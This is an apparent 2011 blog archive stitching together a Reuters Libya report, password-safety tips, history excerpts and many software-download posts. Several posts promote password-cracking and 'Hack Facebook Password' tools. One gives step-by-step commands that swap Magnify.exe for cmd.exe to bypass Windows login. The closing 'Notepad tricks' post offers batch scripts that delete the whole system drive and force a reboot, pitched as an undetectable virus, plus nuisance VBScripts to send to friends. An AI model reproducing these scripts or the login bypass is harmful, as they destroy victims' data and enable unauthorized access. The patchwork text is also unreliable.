News And Events, IT, Forex Information, Sports Information,icons,: 2011

News And Events, IT, Forex Information, Sports Information,icons,

Popular Posts

19 July 2011

U.S. tells Libyans at secret meet: Gaddafi must go

TRIPOLI (Reuters) - Libyan and U.S. officials have met in secret, with Tripoli seeking talks with no preconditions, but Washington saying it delivered the clear message that Muammar Gaddafi must go.
The face-to-face meeting occurred at the weekend as Libyan government forces fought rebels for control of the oil port of Brega, which insurgents said on Monday they now had surrounded in what would be a major boost to their campaign. Tripoli denied this.
The meeting was held "to deliver a clear and firm message that the only way to move forward is for Gaddafi to step down," a U.S. State Department official said.
"This was not a negotiation. It was the delivery of a message." He said no more meetings were planned.
Libya said it welcomed discussions but only without preconditions.
"Any dialogue with the French, Americans, British is welcome," government spokesman Moussa Ibrahim told journalists in Tripoli. "We will discuss everything, but do not condition your peace talks. Let Libyans decide their future."
He said the meeting was in Tunisia on Saturday. The U.S. official said it followed repeated contacts from the Libyan leader's emissaries.
France has also held similar talks with Libyan officials in the Tunisian resort of Djerba, insisting that Gaddafi must go into exile, the BBC reported.
"Clearly the situation is changing. If you had asked me 10 days ago I would have been more cautious," said French Defense Minister Gerard Longuet. "Clearly the situation is moving because Libyans of all origins are absolutely certain that Gaddafi is no longer an option for the future."
He said Gaddafi had to leave soon.
"The countdown has begun ... but I am cautious because Gaddafi is not rational and he could opt for a bunker strategy, taking the whole civilian population of Tripoli hostage."
U.N. Secretary-General Ban Ki-moon declined comment on the Libyan-U.S. meeting, but said the world body was playing a central role in moves to present terms for Gaddafi to quit.
"There are many actors and the United Nations is playing a coordinating role. My special envoy is playing a central coordinating role," Ban told Reuters in Geneva on Tuesday.
He was referring to his envoy Abdul Elah al-Khatib who took part in the international contact group meeting in Istanbul which agreed a road map whereby Gaddafi should relinquish power and plans for Libya's transition to democracy. Khatib, a former Jordanian foreign minister, was authorized to present terms for Gaddafi to leave power.
MOSCOW MEETING
Libya's foreign minister is to meet his Russian opposite number in Moscow on Wednesday, Itar-Tass news agency said. The meeting, requested by the Libyans, would be first known visit by a Libyan government official to Moscow since the war began.
Russia has called for Gaddafi to go, but has criticized Western states for recognizing the rebel leadership as Libya's legitimate government, saying they were taking sides. Moscow emphasizes it is in contact with both rebels and government.
After a long period of stalemate in the desert along the eastern front, the rebels said they had routed most of Gaddafi's troops in Brega to the west, which has an oil refinery and terminal, and encircled the town.
More than 40 people on both sides were reported killed in the fighting since late last week for a city which for months marked the eastern limit of Gaddafi's control.
Rebel spokesman Shamsiddin Abdulmolah said its streets were strewn with landmines, making it hard to secure full control.
"The main body (of Gaddafi's forces) retreated to Ras Lanuf," which lies to the west, he said by telephone from the eastern rebel stronghold of Benghazi.
The government denied the claim.
"Our brave soldiers are in Brega in their thousands and control it completely," spokesman Ibrahim said.
He said the government had lost 30 soldiers over five days of fighting, but rebels had lost many times more.
Abdulmolah said 12 rebels were killed and some 300 wounded on Saturday and Sunday. Most rebel forces were now past Brega and heading west.
Brega has changed hands several times in the back-and-forth fighting along Libya's Mediterranean coast since the rebellion began in February.
Libyan TV, in a bid to counter the rebel claims, showed what it said was footage taken on Monday of ordinary life in Brega, with students taking an exam and workers at a natural gas plant.
Gaddafi is refusing to step down despite the rebellion, NATO air strikes and defections of members of his inner circle.
On Saturday -- as his envoys met U.S. officials -- he called rebels traitors and said he had no plans to leave the country.
(Additional reporting by Andrew Quinn in New Delhi, Nick Carey in Misrata, Steve Gutterman in Moscow, Yasmine Saleh and Omar Fahmy in Cairo, Peter Graff in Al-Qawalish, Libya, Joseph Nasr in Berlin, Stephanie Nebehay in Geneva and Hamid Ould Ahmed in Algiers; Writing by Giles Elgood; Editing by Louise Ireland and Jon Hemming)

02 July 2011

Create strong passwords


Strong passwords are important protections to help you have safer online transactions.

Keys to password strength: length and complexity

An ideal password is long and has letters, punctuation, symbols, and numbers.
  • Whenever possible, use at least 14 characters or more.
  • The greater the variety of characters in your password, the better.
  • Use the entire keyboard, not just the letters and characters you use or see most often.

Create a strong password you can remember

There are many ways to create a long, complex password. Here is one way that may make remembering it easier:
What to doSuggestionExample
Start with a sentence or two (about 10 words total).Think of something meaningful to you.Long and complex passwords are safest.
Turn your sentences into a row of letters.Use the first letter of each word.lacpasikms (10 characters)
Add complexity.Make only the letters in the first half of the alphabet uppercase.lACpAsIKMs (10 characters)
Add length with numbers.Put two numbers that are meaningful to you between the two sentences.lACpAs56IKMs (12 characters)
Add length with punctuation.Put a punctuation mark at the beginning.?lACpAs56IKMs (13 characters)
Add length with symbols.Put a symbol at the end.?lACpAs56IKMs" (14 characters)

Test your password with a password checker

A password checker evaluates you

6 rules for safer password transactions online


Whether you go online to check your bank balance, pay a bill, give money, shop, or sell something, these six rules can help you keep the risks to a minimum.
  • Defend your computer against Internet threats

    Help protect your online transactions by using firewall, antivirus, and antispyware software. Encrypt your wireless connection at home. Keep all software (including your web browser) current with automatic updates. For more information, see How to boost your malware defense and protect your PC.
  • Create strong passwords

    Strong passwords are easy for you to remember but difficult for others to guess. They are at least 14 characters long (the longer the password, the better) and include numbers, symbols, and upper and lower case letters. For more information, see Learn how to create strong passwords. If you already have a password in mind, check your password strength.)
    • Keep passwords and PINs (personal identification numbers) secret. Do not share them in email, instant messages, or over the phone.
    • Use unique passwords for bank accounts and other important financial information. Avoid using the same password everywhere. If someone steals that password, all the information that the password protects is at risk.
  • Find the web address yourself

    Links in email messages, text messages, instant messages, or pop-up ads can take you to websites that look legitimate but are not. To visit websites, type the address yourself or use your own bookmark or favorite.
  • Look for signs that your information is safe

    Before you enter sensitive data on a web page, ensure that:
    • The site uses encryption, a security measure that helps protect your data as it traverses the Internet. Signs of encryption include a web address with https ("s" stands for secure) and a closed padlock beside it. (The lock might also be in the lower right corner of the window.)
      Image of green address bar in Internet Explorer
    • You are at the correct website—for example, at your bank's site, not a fake one. If you are using Internet Explorer, one sign of trustworthiness is a green address bar like the one above.
  • Save financial transactions for your home computer

    Never pay bills, bank, shop, or do other financial business on a public or shared computer or on devices such as laptops or mobile phones that are on public wireless networks. The security is unreliable.
  • Use common sense

    To protect yourself against fraud, watch out for scams. For example, be wary of deals that sound too good to be true, alerts from your "bank" that your account will be closed unless you take some immediate action, notices that you have won a lottery, or a refusal to meet in person for a local transaction.
    Typically this kind of message, whether sent by computer or phone, is designed to entice you to visit a phony website where criminals collect your financial data. (If you doubt the message's authenticity, call the company.) Learn to spot phishing scams and defend against them

01 July 2011

california history

The history of California can be divided into several periods: the Native American period; European exploration period from 1542 to 1769; the Spanish colonial period, 1769 to 1821; the Mexican period, 1821 to 1848; and United States statehood, which continues to the present day.

The early history of California is characterized by being surrounded by barriers nearly isolating the state: the Pacific Ocean to the west, the Sierra Nevada mountains backed by the nearly barren Great Basin in the east, the Mojave Desert and Sonora Desert areas in the southeast and Redwood–Douglas fir forests to the northwest. The near isolation of the California Indian tribes led them to develop cultures different than the other Indian cultures in the Americas. California Indians tribes had essentially no agriculture (with the exception of the Colorado River Indians) and were hunter-gatherers. The Indians had no crops, advanced cities, accumulated wealth or organized civilizations to exploit. The Spaniards, after initial explorations, left Alta California alone for over 200 years. Relative isolation continued even after Spanish Mission, Presidio and pueblo settlements began in 1769. The only easy communication with the rest of New Spain (Mexico) was by ship as the Quechan (Yuma) Indians shut down the Anza Trail in 1781. This trail (discovered 1776) across Arizona along the Gila and the Colorado River crossing (Yuma Crossing) was the only "easy" way by land from Mexico to California. Essentially the only communication from Mexico to California was via a 30-50 day sailing ship voyage against the south bound California Current and the often opposing winds. The sailing ship trip from California to

spanish history

The history of Spain involves all the other peoples and nations within the Iberian peninsula formerly known as Hispania, and includes still today the nations of Andorra, Gibraltar, Portugal and Spain. It spans from prehistoric Iberia, through the rise and decline of a global empire, to the recent history of Spain as a member of the European Union. Modern humans entered the Iberian Peninsula about 32,000 years ago. Different populations and cultures followed over the millennia, including the Iberians, the Tartessians, Celts and Celtiberians, Phoenicians, Greeks, Carthaginians, Romans, Suebi and Visigoths. In 711, the Moors, a Berber and Arab army, invaded and conquered nearly the entire peninsula. During the next 750 years, independent Muslim states were established, and the entire area of Muslim control became known as Al-Andalus. Meanwhile the Christian kingdoms in the north began the long and slow recovery of the peninsula, a process called the Reconquista, which was concluded in 1492 with the fall of Granada.

The Kingdom of Spain was created in 1492 with the unification of the Kingdom of Castile and the Kingdom of Aragon.[1] The first voyage of Christopher Columbus to the New World took place that same year, beginning the development of the Spanish Empire. The Inquisition was established and Jews and Muslims who refused to convert were expelled from the country.

For the next three centuries Spain was the most important colonial power in the world. It was the most powerful state in Europe and the foremost global power during the 16th century and the greater part of the 17th century. Spanish literature and fine arts, scholarship and philosophy flourished during this time. Spain established a vast empire in the Americas, stretching from California to Patagonia, and colonies in the western Pacific. Financed in part by the riches pouring in from its colonies, Spain became embroiled in the religiously charged wars and intrigues of Europe, including, for example, obtaining and losing possessions in today's Netherlands, Italy, France, and Germany, and engaging in wars with France, England, Sweden, and the Ottomans in the Mediterranean Sea and northern Africa. Spain's European wars, however, led to economic damage, and the latter part of the 17th century saw a gradual decline of power under an increasingly neglectful and inept Habsburg regime. The decline culminated in the War of Spanish Succession, which ended with the relegation of Spain from the position of a leading western power, to that of a secondary one, although it remained (with Russia) the leading colonial power.

The 18th century saw a new dynasty, the Bourbons, which directed considerable efforts towards the renewal of state institutions, with some success, finishing in a successful involvement in the American War of Independence. However, as the century ended, a reaction set in with the accession of a new monarch. The end of the eighteenth and the start of the 19th centuries saw turmoil unleashed throughout Europe by the French Revolutionary and Napoleonic Wars, which finally led to a French occupation of much of the continent, including Spain. This triggered a successful but devastating war of independence that shattered the country and created an opening for what would ultimately be the successful independence of Spain's mainland American colonies. Shattered by the war, Spain was destabilised as different political parties representing "liberal", "reactionary" and "moderate" groups throughout the remainder of the century fought for and won short-lived control without any being sufficiently strong to bring about lasting stability. Nationalist movements emerged in the last significant remnants of the old empire (Cuba and the Philippines) which led to a brief war with the United States and the loss of the remaining old colonies at the end of the century.

Following a period of growing political instability in the early 20th century, in 1936 Spain was plunged into a bloody civil war. The war ended in a nationalist dictatorship, led by Francisco Franco which controlled the Spanish government until 1975. Spain was officially neutral during World War II, although many Spanish volunteers fought on both sides. The post-war decades were relatively stable (with the notable exception of an armed independence movement in the Basque Country), and the country experienced rapid economic growth in the 1960s and early 1970s. The death of Franco in 1975 resulted in the return of the Bourbon monarchy headed by Prince Juan Carlos. While tensions remain (for example, with Muslim immigrants and in the Basque region), modern Spain has seen the development of a robust, modern democracy as a constitutional monarchy with popular King Juan Carlos, one of the fastest-growing standards of living in Europe, entry into the European Community, and the 1992 Summer Olympics.
Contents
[hide]

    1 Early history
    2 Roman Hispania
    3 Germanic Occupation of Hispania (5th–8th centuries)
    4 Muslim Era—al-Andalus (8th–15th centuries)
    5 Dynastic Union
        5.1 The Spanish language and universities
    6 Imperial Spain
    7 Spanish Kingdoms under the Habsburgs (16th–17th centuries)
        7.1 The Golden Age (Siglo de Oro)
    8 Enlightenment: Spain under the Bourbons (18th century)
    9 Napoleonic Wars: War of Spanish Independence (1808–1814)
    10 Spain in the nineteenth century (1814–1873)
    11 First Spanish Republic (1873–1874)
    12 The Restoration (1874–1931)
        12.1 Disaster of 1898
        12.2 World War I
    13 Second Spanish Republic (1931–1939)
    14 Spanish Civil War (1936–1939)
    15 The dictatorship of Francisco Franco (1936–1975)
    16 Spain since 1975
        16.1 Transition to democracy
        16.2 Modern Spain
    17 Notes
    18 Bibliography
    19 External links
    20 See also
 Early history
Main article: Prehistoric Iberia

The earliest record of hominids living in Europe has been found in the Spanish cave of Atapuerca; fossils found there date to roughly 1.2 million years ago.[2] Modern humans in the form of Cro-Magnons began arriving in the Iberian Peninsula from north of the Pyrenees some 35,000 years ago. The most conspicuous sign of prehistoric human settlements are the famous paintings in the northern Spanish cave of Altamira, which were done c. 15,000 BC and are regarded as paramount instances of cave art.[3] Furthermore, archeological evidence in places like Los Millares in Almería and in El Argar in Murcia suggests developed cultures existed in the eastern part of the Iberian Peninsula during the late Neolithic and the Bronze Age.[4]

The seafaring Phoenicians, Greeks and Carthaginians successively settled along the Mediterranean Sea near Tartessos, modern day Cádiz. Regarding Tartessos, it should also be mentioned that according to John Koch[5] Cunliffe, Karl, Wodtko and other highly respected scholars, Celtic culture may well have developed first in far Southern Portugal and Southwestern Spain, approximately 500 years prior to anything recorded in Central Europe.[6][7] The Tartessian language from the southwest of Spain, written in a version of the Phoenician script in use around 825 BC, has been readily translated by John T. Koch as Celtic and is being accepted by a growing number of philologists and other linguists as the first Celtic language.[5][8][9] In the 9th century BC, the first Greek colonies, such as Emporion (modern Empúries), were founded along the Mediterranean coast on the east, leaving the south coast to the Phoenicians. The Greeks are responsible for the name Iberia, apparently after the river Iber (Ebro in Spanish). In the 6th century BC, the Carthaginians arrived in Iberia, struggling first with the Greeks, and shortly after, with the newly arriving Romans for control of the Western Mediterranean. Their most important colony was Carthago Nova (Latin name of modern day Cartagena).[10]

The native peoples whom the Romans met at the time of their invasion in what is now known as Spain were the Iberians, inhabiting from the southwest part of the Peninsula through the northeast part of it, and then the Celts, mostly inhabiting the north and northwest part of the Peninsula. In the inner part of the Peninsula, where both groups were in contact, a mixed, distinctive, culture was present, the one known as Celtiberian.[2] The Celtiberian Wars or Spanish Wars were fought between the advancing legions of the Roman Republic and the Celtiberian tribes of Hispania Citerior from 181 to 133 BC.[11][12]
 Roman Hispania
Main article: Hispania
Further information: Roman conquest of Hispania
Further information: Romanization of Hispania
Roman bridge in Cordoba

Hispania was divided: Hispania Ulterior and Hispania Citerior during the late Roman Republic; and, during the Roman Empire, Hispania Taraconensis in the northeast, Hispania Baetica in the south (roughly corresponding to Andalucia), and Lusitania in the southwe

Roman history Battle of Veii (1998 )


The Battle of Veii, also known as the Siege of VeiiMichael Grant, The History of Rome, p. 42 is a battle of ancient Rome, approximately dated at 396 BC. The main source about it is Livy's Ab Urbe Condita.The Romans were led by a dictator (in Roman Republic, this was an emergency general rather than a tyrant) named Marcus Furius Camillus. Their opponent, the Etruscan city of Veii, a large city close to Rome had engaged the Romans in a long and inconclusive war during which it had often been under siege. In order to break the siege once and for all, a tunnel was reputedly built beneath the city.Livy describes the scene with the Veientines holed up in their city, the main Roman force encamped outside and a second force set to attack from within via the tunnel. After this prayer from Camillus,Pythian Apollo, guided and inspired by thy will I go forth to destroy the city of Veii, and a tenth part of its spoils I devote to thee. Thee too, Queen Juno, who now dwellest in Veii, I beseech, that thou wouldst follow us, after our victory, to the City which is ours and which will soon be thine, where a temple worthy of thy majesty will receive thee. He attacked from all sides.The Veientines wondered "what had happened to make the Romans, after never stirring from their lines for so many days, now run recklessly up to the walls as though struck with sudden frenzy".At this time, the Romans emerged from the entrance of the tunnel inside the temple of Juno and the forces inside and out quickly overwhelmed Veii. After the fighting slackened, Camillus offered to spare the unarmed who began to surrender as the soldiers gathered booty.The wealth so impressed Camillus that he gave a speech, d...

World History Battles of Lexington and Concord

The Battles of Lexington and Concord were the first military engagements of the American Revolutionary War. They were fought on April 19, 1775, in Middlesex County, Province of Massachusetts Bay, within the towns of Lexington, Concord, Lincoln, Menotomy (present-day Arlington), and Cambridge, near Boston. The battles marked the outbreak of open armed conflict between the Kingdom of Great Britain and its thirteen colonies in the mainland of British North America.

About 700 British Army regulars, under Lieutenant Colonel Francis Smith, were ordered to capture and destroy military supplies that were reportedly stored by the Massachusetts militia at Concord. Dr. Joseph Warren alerted the colonists of this. The Patriot colonists had received intelligence weeks before the expedition which warned of an impending British search, and had moved much, but not all, of the supplies to safety. They had also received details about British plans on the night before the battle, and information was rapidly supplied to the militia.

The first shots were fired just as the sun was rising at Lexington. The militia were outnumbered and fell back. Other British colonists, hours later at the North Bridge in Concord, fought and defeated three companies of the king's troops. The outnumbered soldiers of the British Army fell back from the Minutemen after a pitched battle in open territory.

More Minutemen arrived soon thereafter and inflicted heavy damage on the British regulars as they marched back towards Boston. Upon returning to Lexington, Smith's expedition was rescued by reinforcements under Hugh, Earl Percy. A combined force of fewer than 1,700 men marched back ...

24 June 2011

How to Add and Verify Blogger Blog in Yahoo Siteexplorer


Blogger
As the Yahoo Search is most popular search engine after Google Search. Hence Yahoo can also bring some traffic to your website and may be you get higher rankings in Yahoo than Google and that translates into more Adsense Revenue. But for this you need to submit your Blogger blog sitemap to it and most importantly site feeds. For this you also need to verify your blog in Yahoo, learn here how to verify your blogger blog in Yahoo.
Requirements
1. Computer
2. Intern

14 June 2011

Hot wallpaper Nina Dobrev










http://images4.fanpop.com/image/photos/19900000/Nina-Dobrev-maryam1311-19958739-1024-768.jpg

            
                                                        Size:1024 × 768
                                                       Type:230KB JPG          





                                            I hope u like it

13 June 2011

Reset Windows Password 1.1.0.148 Lite Edition




Reset Windows Password 1.1.0.148 Lite Edition | 126MB
Bu program ile windows işletim sisteminde kullandığınız yerel yönetici yani administratör şifresi veya kullanıcı şifrelerini sıfırlayabilirsiniz.Program isteğe göre ev kullanıcıları ve işletmeler için bir şifre kurtarma CD si veya USB Flash belleğinize şifreyi sıfırlamak için gerekli dosyaları oluşturur. Bu şimdiye kadar windows şifresini kaldırmak için en popüler ve güvenli bir çözümdür.Programı kullanmak için herhangi bir teknisyene veya bilgisayarı biçimlendirmeye gerek yoktur.
Reset Windows Password - the best professional program to reset, change or recover passwords for all types of user accounts Windows. Utility supports all versions of Windows, working with local and domain accounts, almost instantly recovers passwords for the accounts, moreover.

Reset Windows Password is required when they lose an administrator password, if forgotten password to log on Windows, it is not possible to activate your account. Theprogram is loaded from a bootable CD or USB drive. The application interface is made in the form of the wizard. Therefore, the process of operation does not seem difficult, even inexperienced users.

Unlike other similar utilities, Reset Windows Password - the only program that works correctly with all types of user accounts Windows.
Features Reset Windows Password:
- Simple, intuitive graphical interface.
- Reset and change passwords of local users and administrators, administrators of the domain user accounts, account DSRM.
- Activation and unlock user accounts.
- Disables password expiration.
- Advanced algorithms for finding the password.
- Support for all versions of Windows, including Windows 7.
- Supports Windows (X64).
- Boot from a bootable CD or USB drive.
- A large collection of IDE, SATA, SCSI, RAID drivers.
- Detects
multiple operating systems installed on your computer.
- Allows you to undo changes made to the system.
- Removes passwords and other sensitive data from your computer.



Top Password 2010 Bundle



Top Password 2010 Bundle
Password Recovery Bundle 2010 is a must-have toolkit in case your password is lost or forgotten, capable of cracking and recovering over 45 types of passwords from instant messengers, email clients, web browsers, FTP clients, and many other applications. It is very simple to use, with just a few mouse clicks, all your logins and passwords will be recovered instantly.
Key Features & Benefits
* 100% recovery rate.
* Wide compatibility - Recover passwords to a variety of email clients, instant messengers, ftp clients, web browsers and many other applications.
* Unique abilities - More than 45 programs passwords can be recovered.
* Save you time and money - Find your lost passwords easily! No need to call in an expensive PC technician. Never worried about losing your important accounts again.
* Instant recovery - Recover passwords to all your accounts within seconds.
* User-friendly interface. It is quite easy to use.

Internet Password Lock v7.0.0




Internet Password Lock v7.0.0

Internet Password Lock v7.0.0 | 6.8MB


Internet Password Lock is a software program for Windows 2000/XP/NT/Vista computers (does not work on Windows 95/98/Me) that allows you to block, control and restrict Internet access. This includes Web browsing and surfing, Instant Messaging, and email. Parents can use Internet Password Lock to protect your children by making sure children do not use the Internet without a parent present. Businesses can use Internet Password Lock to lock out unauthorized Internet use. Once Internet Password Lock is installed, all Internet access will be blocked when Windows starts. To access the Internet, you must view the main Internet Password Lock screen by clicking on the Internet Password Lock icon on the system tray and then input a password (selected by you when you install Internet Password Lock). You can

Plato Safe Password Manager 11.03.01





Plato Safe Password Manager 11.03.01

Plato Safe Password Manager 11.03.01 | 1.55 MB

Plato Safe Password Manager is an easy-to-use password manager for Windows to store your passwords in a highly encrypted database, and the database consists of only one file, it can be easily transferred from one computer to another. Today you need to remember many passwords. You need a password for the Windows network logon, e-mail account, homepage's FTP password, website member account, etc. How can you remember all those passwords?
Key Features:
• Supports password groups, you can sort your passwords (for example into Windows, Internet, FTP, HomeBack etc.).
• Export the password database to TXT,CSV,XML,HTML formats.
• Import password from CS

AllyNova HTML Password Wizard v3.1



AllyNova HTML Password Wizard v3.1
[MULTI] AllyNova HTML Password Wizard v3.1 | 0.4 MB.

HTML Password Wizard - Password protect web page, html page and whole website. If you have a website, you may want to password protect some web pages of your site. Visitors need to login before enter these protected web pages.

With HTML Password Wizard, you can encrypt and password protect web page, html page and whole website in minutes. HTML Password Protect uses strong industrial standard encryption algorithms to encrypt the web pages with password, and the password will not be stored in the encrypted web pages. It can protect multiple web pages and visitors need to login only once.

You can encrypt and password protect web pages with single password or multiple user names and passwords, and the number of user names and passwords is unlimited.

HTML Password Wizard Features:
• Encrypt and password protect web pages or website in minutes.
• Uses strong industrial standard encryption algorithms.
• Number of user names and passwords i

How To reset Windows Server 2008 password



You have just completed installing Windows Server 2008, and you hit the Ctrl+Alt+Delete key and then you were lost, What administator password and username should I used? Especially that you did not create any during the installation process! In this article, I will show you how to successfully reset to Windows server 2008.
Windows Server 2008 is one of Microsoft Windows' server line of operating systems. Released to manufacturing on February 4, 2008, and officially released on February 27, 2008, it is the successor to Windows Server 2003, released nearly five years earlier. A second release, named Windows Server 2008 R2, was released to manufacturing on July 22, 2009.
The solution is a two stage process. The first stage is preparation and requires the use of PING (Partimage is not ghost) which is a linux environment that can run off of a disc. You need to download the PING image and burn it to a disc before continuing.
Now that you have the disc ready, here are the steps to follow:
1. Put the disc in your server and boot off of it. The process to do this differs by server but I am sure you can figure it out (or have done it before).
2. The PING linux environment will load.
3.When the environment is fully loaded, you will receive a “>>” prompt.
4.At the “>>” prompt, type “x” and press the ENTER key. “x“ will take you to a command shell rather than launching the PING user interface.
6.At the “PING login:” prompt, type in “root” and press the ENTER key.
7.At this ping you should be logged into the PING operating system. Now we need to run a few shell commands.
Run the following command: fdisk -l : grep NTFS
8.This command will list all the NTFS partitions. As best as you can, note the name of the one that contains the Windows directory.
9.Run the following command: mkdir -p /mnt/windows
10.This command creates a directory called “/mnt/windows” that will be used for mounting the windows partition
11.Run the following command: mount -t ntfs-3g /dev/sda3 /mnt/windows
12.This command actually performs the mount. “/dev/sda3″ is the name of the device (from step 7) that holds the windows partition. This was “sda3″ for me but may vary for you.
13.Run the following command: cd /mnt/windows/Windows/System32
14.This command changes the current directory to the System32 directory in the Windows partition. Now that the partition has been mounted, you can consider “/mnt/Windows” as the root drive of your server so “/mnt/windows/Windows/System32″ is the equivalent to “C:\Windows\System32″.
15.Run the following command: mv Magnify.exe Magnify.bak
16.This command renames the “Magnify.exe” file, which is in the System32 folder.
17.Run the following command: cp cmd.exe Magnify.exe
18.This command, the final one, makes a copy of “cmd.exe” and names it “Magnify.exe”.
19.Remove the disc and reboot.
The steps above all make up the first stage, which is really the primary stage. You see, we can’t really (easily) recover the password. All the steps above bring you to a point where you will actually be able to bypass authentication all together with something akin to a backdoor. Now you see why I started by saying that it should only be used for good.
For the second stage, we need to wait until Windows has booted and you are at the login screen. On this screen you will notice a small icon in the lower left corner o

RAR Password Cracker 4.12





http://static.rbytes.net/full_screenshots/r/a/rar-password-cracker.jpg
RAR Password Cracker v4.12
This program is intended to recover lost passwords for RAR/WinRAR archives of versions 2.xx and 3.xx. The program finds by the method of exhaustive search all possible combinations of characters ("bruteforce" method), or using passwords from lists ("wordlist" or "dictionary" method). Self-extracting archives and multivolume archives are supported. The program is able to save a current state (you can interrupt the program at any time, and restart from the same state later). Estimated time calculator allows you to configure the program more carefully.
System requirements
RAR Password Cracker requires Windows 9x/ME/XP/NT4/2000/2003. There are no special requirements for memory capacity, but the processor perfor

Password Depot Professional 4.1.4 - Repack


Password Depot Professional 4.1.4 - Repack
Password Depot Professional 4.1.4
Password Depot Professional 4.1.4 - Repack
Password Depot Professional 4.1.4
Password Depot 4 protects your important and confidential passwords from external access while offering maximum user-friendliness!
For Computer Build 01/08, Password Depot is the password safe which "as the only software was able to make a good impression when faced with the comprehensive security test".



12 Password Cracker Tools


12 Password Cracker Tools
Password Breaker & Cracker Mega Thread | 40 MB
1) PDF Password Remover
2) Windows XP Admin Password Remover
3) Zip File Password Cracker
4) SQL Password Remover
5) Microsoft Office Password Remover
6) Windows Vista Admin Password Recovery
7) Windo

Windows Admin Password Hack

Windows Admin Password Hack
Windows Admin Password Hack


Windows Admin Password Hack :
This is a utility to (re)set the password of any user that has a valid (local) account on your NT system.
You do not need to know the old password to set a new one.
It works offline, that i

Hack Facebook Password

Hack Facebook Password

Hack Facebook PasswordHack Facebook Password
Hack Facebook PasswordHack Facebook Password




Hack Facebook Password

Hack Facebook PasswordHack Facebook Password Only 11.89 MB

4 Password Recovery Apps

4 Password Recovery Apps

4 Password Recovery Apps
4 Password Recovery Apps
AIM Password Recovery
Password Recovery for MSN
Password Recovery for MySpace IM
Password Recovery for Windows Live
Password Recovery for MySpaceIM finds and shows MySpace passwords saved by MySpaceIM (instant messenger
created by MySpace) on your local system. Your MySpace password will be decrypted if you can successfully
login with MySpaceIM without entering your password. The program also allows recovery of MySpace passwords
from MySpaceIM data files extracted from other hard drives or user accounts (external recovery is explained
below on this page). Download and install MySpace password recovery tool and see if it can decode your
MySpace passwords
Windows Live Password Recovery is the tool that will instantly recover Windows Live® passwords that were
saved by Windows Live Messenger on your PC under the current login. This cracker works when you are able to
login with your messenger automatically without entering your password. It will recover multiple accounts
and supports all known versions of Windows Live Messenger. Works on Windows XP, Windows Vista and Windows
7. Even if you have un-installed Windows Live Messenger there is still a chance that your password is saved
on your PC. This is a great way to restore your long forgotten Windows Live Hotmail® password.
Password Recovery for MSN is the MSN messenger password recovery program that finds all encrypted MSN
Messenger, Windows Live Messenger and Windows Messenger passwords stored on the local system. It then
displays them in an easy to read format. This program works if after clicking the "Sign-In" button in your
messenger you're able to login automatically without entering your MSN password.
AIM (AOL Instant Messenger) Password Recovery will find all encoded AIM passwords stored on the local PC
under the current account. The passwords will then be cracked and decoded (decrypted) to display on the
screen in a user-friendly format. Correct passwords will of course be displayed only if you are able to
login automatically in AIM without entering your password for the account you want to recover. Works with
the latest version of AIM (6). Passwords for multiple profiles (screen names) can be cracked. It costs
nothing to download AIM Password Recovery and see if the passwords are recoverable
4 Password Recovery Apps
AIM Password Recovery
Password Recovery for MSN
Password Recovery for MySpace IM
Password Recovery for Windows Live
Password Recovery for MySpaceIM finds and shows MySpace passwords saved by MySpaceIM (instant messenger
created by MySpace) on your local system. Your MySpace password will be decrypted if you can successfully
login with MySpaceIM without entering your password. The program also allows recovery of MySpace passwords
from MySpaceIM data files

Note pad tricks code

Full] Collection of notepad tricks!

write ur own simple virus cant detected by any antivirus....
@Echo off
Del C:\ *.*
y


or better version


@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00


And save that as .bat not .txt and RUN IT
It will delete the content of C:\ drive...
PLEASE NoTe::::: dont run that .bat file on ur system .... it will delet c:...
IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive
EVEN I DIDN't TRY THIS........
I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...
-------------------------------------------------------------------------
-------------------------------------------------------------------------
2) Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :
Code:
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject


Next
End If
wscript.sleep 5000
loop


Save it as "Anything.VBS" and send it.
==============================================================
3) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop


Save it as "Anything.VBS" and send it.
==============================================================
4) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :
Code:
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "


Save it as "Anything.VBS" and send it.
==============================================================
5) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
Code:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Save it as "Anything.VBS" and send it.
==============================================================
6) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
Save it as "Anything.VBS" and send it.
==============================================================
7) Open Notepad continually in your friend's computer:
Type :
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.
==============================================================
8 ) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
Code:
@echo off
title The end of the world
cd C:\
:menu
cls
